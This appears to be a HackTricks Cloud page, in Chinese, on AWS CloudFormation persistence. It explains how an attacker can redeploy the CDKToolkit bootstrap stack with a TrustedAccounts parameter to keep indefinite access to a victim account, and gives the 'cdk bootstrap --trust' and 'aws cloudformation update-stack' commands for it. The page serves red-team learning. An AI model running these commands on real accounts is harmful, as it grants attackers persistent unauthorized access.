HackTricks CloudAWS - Cloudformation 持久化
Tip
学习并练习 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。
CloudFormation
更多信息请访问:
AWS - CloudFormation & Codestar Enum
CDK Bootstrap Stack
AWS CDK 会部署一个名为 CDKToolkit 的 CFN 堆栈。该堆栈支持一个参数 TrustedAccounts,允许外部账户将 CDK 项目部署到受害者账户中。攻击者可以滥用这一点,通过使用 AWS cli 带参数重新部署该堆栈,或使用 AWS CDK cli,为自己获取对受害者账户的无限期访问权限。
# CDK
cdk bootstrap --trust 1234567890
# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
Tip
学习并练习 AWS Hacking:
学习并练习 GCP Hacking:
学习并练习 Az Hacking:支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。